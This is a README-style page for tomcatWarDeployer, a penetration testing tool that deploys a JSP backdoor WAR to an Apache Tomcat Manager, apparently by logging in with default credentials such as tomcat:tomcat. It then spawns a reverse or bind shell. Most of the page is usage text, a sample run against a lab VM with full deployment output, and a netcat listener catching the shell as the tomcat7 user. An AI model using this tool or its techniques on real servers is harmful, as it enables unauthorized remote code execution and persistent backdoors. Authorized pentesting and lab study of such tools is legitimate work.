tomcatWarDeployer - Apache Tomcat auto WAR Deployment & Pwning Penetration Testing Tool

Apache Tomcat auto WAR deployment & pwning penetration testing tool.

What is it?
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).
In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

As simple as providing server's address with port, as a IP:PORT pair. Here goes the help:
user$ python tomcatWarDeployer.py --help

Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server Specifies server address. Please also include port after colon.

-h, --help show this help message and exit

General options:
-v, --verbose Verbose mode.
-G OUTFILE, --generate=OUTFILE
Generate JSP backdoor only and put it into specified
outfile path then exit. Do not perform any
connections, scannings, deployment and so on.
-U USER, --user=USER
Tomcat Manager Web Application HTTP Auth username.
-P PASS, --pass=PASS
Tomcat Manager Web Application HTTP Auth password.

Connection options:
-H RHOST, --host=RHOST
Remote host for reverse tcp payload connection. When
specified, RPORT must be specified too. Otherwise,
bind tcp payload will be deployed listening on
-p PORT, --port=PORT
Remote port for the reverse tcp payload when used with
RHOST or Local port if no RHOST specified thus acting
as a Bind shell endpoint.
-u URL, --url=URL Apache Tomcat management console URL. Default:

Payload options:
Remove deployed app with specified name. Can be used
for post-assessment cleaning
Specifies authentication password for uploaded shell,
to prevent unauthenticated usage. Default: randomly
generated. Specify "None" to leave the shell
-t TITLE, --title=TITLE
Specifies head>title for uploaded JSP WAR payload.
Default: "JSP Application"
Specifies JSP application name. Default: "jsp_app"
-x, --unload Unload existing JSP Application with the same name.
Default: no.
-C, --noconnect Do not connect to the spawned shell immediately. By
default this program will connect to the spawned
shell, specifying this option let's you use other
handlers like Metasploit, NetCat and so on.
Custom WAR file to deploy. By default the script will
generate own WAR file on-the-fly.
And sample usage on Kevgir 1 VM by canyoupwn.me running at :
user$ python tomcatWarDeployer.py -C -x -v -H -p 4545 -n shell

Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to:
DEBUG: Browsing to ""... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for shell WAR at: "/tmp/tmpzndaGR"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/shell.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 541) (out= 254)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1597)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpzndaGR
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│   └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "shell" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: ""
DEBUG: Succeeded.
DEBUG: Deploying application: shell from file: "/tmp/shell.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpzndaGR"
DEBUG: Succeeded, invoking it...
DEBUG: Invoking application at url: ""
DEBUG: Adding 'X-Pass: b8vYQ9EU7suV' header for shell functionality authentication.
WARNING: Set up your incoming shell listener, I'm giving you 3 seconds.
INFO: JSP Backdoor up & running on
INFO: Happy pwning, here take that password for web shell: 'b8vYQ9EU7suV'
Which will result in the following JSP application accessible remotely via WEB:

As one can see, there is password needed for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.
Also, this particular example performs reverse shell popping by connecting here to the . There one can observe:
user $ nc -klvp 4545
listening on [any] 4545 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 44423
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
Summing up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving X-Pass header in the invocation phase, spawned reverse connection to our netcat handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.
That would be all I guess.

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